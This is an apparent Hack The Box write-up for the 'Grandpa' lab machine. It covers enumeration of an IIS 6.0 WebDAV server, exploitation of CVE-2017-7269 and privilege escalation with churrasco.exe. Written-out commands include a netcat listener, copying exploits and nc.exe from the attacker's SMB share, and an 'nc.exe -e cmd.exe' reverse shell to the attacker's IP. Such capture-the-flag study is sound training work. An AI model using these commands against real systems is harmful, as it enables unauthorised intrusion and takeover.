Grandpa HTB

IP

10.10.10.14

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.14 | cut -d"/" -f1 | tr '\n' ','

we can see we only have port 80 up and running on the target, Lets run a more in-depth nmap scan and see if we can find anything else on the machine

sudo nmap -sCV -p80 -oA Port_scan 10.10.10.14

results

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|   Server Date: Sat, 30 Dec 2023 02:16:39 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds

We can see the following

• We have a Microsoft IIS server version 6.0 (outdatted)

  • Possible Vulnerability: CVE-2017-7269

• the WebDAV protocol is enabled meaning this enables users the ability share, copy, move and edit etc files through the web server

Lets check out the web server

we can see the following

we can see the website administrator has not created a defualt page

for good measures well use feroxbuster and see if we can find anything interesting

feroxbuster -u http://10.10.10.14 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x asp,aspx -o dirs.txt

• /images

Since we now webdav is enabled, this seems like a good place to find a attack vector

we have the supported methods, we found in our nmap scan

• TRACE: Echoes back the received request, can be useful for debugging

• COPY: Copies a resource from one location to another

• PROPFIND: Retrieves properties of a resource

• SEARCH: Performs a search based on a given query

• LOCK: Locks a resource, preventing other processes from modifying it.

• UNLOCK: Releases a lock on a resource

• DELETE: Deletes a specified resource

• PUT: Uploads a specific resource

• MOVE: Moves a resource from one location to another

• MKCOL: Creates a new collection (e.g a directory)

• PROPPATCH: Modifies the properties or a resource

we can do some basic enumeration

Lets check if we can upload a file and what exttentions the target will allow us to

we can use davtest

davtest -url http://10.10.10.14

we can see we have a successful connection to the webdav server, but we cannot upload (PUT) anything to the server to the server

We did find CVE-2017-7269 after a bit of reading, this could be our attack vector

Quick google search we find a working exploit

CVE-2017-7269/ii6_reverse_shell.py at main · h3x0v3rl0rd/CVE-2017-7269GitHub

For this to work we need to set up a netcat listner and run the exploit

1. start a listner

rlwrap -cAr nc -lvnp 9001

1. run the exploit

python2 exploit.py 10.10.10.14 80 10.10.14.28 9001

we now have a shell on the target

Lets gather some information of the system

systeminfo

we can see we are dealing with an old machines that has not been updated for some time, we can feed this to wesng and see if there are any exploits we can utilise

sudo /opt/wesng/wes.py --update 
sudo /opt/wesng/wes.py systeminfo > possible_exploits

• we now have a file of possible exploits we can run on the target

We also utilise windows-exploit suggestor as i have had the best luck from it

GitHub - Pwnistry/Windows-Exploit-Suggester-python3: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.GitHub

sudo /opt/Windows-Exploit-Suggester-python3/windows-exploit-suggester.py --update
sudo /opt/Windows-Exploit-Suggester-python3/windows-exploit-suggester.py -i systeminfo -d 2023-12-30-mssb.xlsx

we have te following results

MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]
  https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]
  https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]

[E]
MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]
  https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]
  https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]
  https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]

[E]
MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]
  http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]

[E]
MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]
  http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]

[M]
MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]
  https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]
  http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]
  http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]
  http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]
  http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]
  http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]

[M]
MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]
  http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]
  http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]

[M]
MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]
  http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]

[E]
MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]
  https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]
  https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]

[E]
MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E]
MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]
  http://www.exploit-db.com/exploits/34458/
[*]

[E]
MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]
  http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]

[M]
MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M]
MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E]
MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E]
MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M]
MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M]
MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M]
MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M]
MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M]
MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M]
MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M]
MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M]
MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M]
MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E]
MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]
  http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]
  http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]

[M]
MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E]
MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M]
MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M]
MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M]
MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M]
MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M]
MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M]
MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M]
MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M]
MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M]
MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M]
MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M]
MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M]
MS08-078: Security Update for Internet Explorer (960714) - Critical
[*]
done

Lets get some information about our current user

whoami /all

Possible attack (juicy potato)

Lets try ms15-051 using the following exploit code

windows-kernel-exploits/MS15-051/MS15-051-KB3045171.zip at master · SecWiki/windows-kernel-exploitsGitHub

Once we have downloaded the code and unzipped it onto our local machine we need to transfer this to our target machine

1. Lets start a smb server on our local machine

sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2support

1. Lets copy the exploit to our target machine

copy \\10.10.14.28\shrek123\ms15-051.exe C:\Temp

Transfered over no problem we just now need netcat for windows so we can start another shell

transfer over netcat via smb

copy \\10.10.14.28\shrek123\nc.exe C:\Temp

While trying run the exploit, ran into some problems

Since we have the SeImpersonatePrivilege enabled and it is a Windows server 2003 we can use the following exploit 'churrasco.exe` to perform some token manipulation

https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

Lets download our files again

copy \\10.10.14.28\shrek123\nc.exe C:\wmpub
copy \\10.10.14.28\shrek123\churrasco.exe C:\wmpub

• quick note I had problems with nc.exe and the only version I found that worked was /usr/share/seclists/SecLists-master/Web-Shells/FuzzDB/nc.exe (seclists nc.exe version)

now once we run the exploit

churrasco.exe -d "c:\wmpub\nc.exe -e cmd.exe 10.10.14.28 9005"

we can see we have established another shell as the user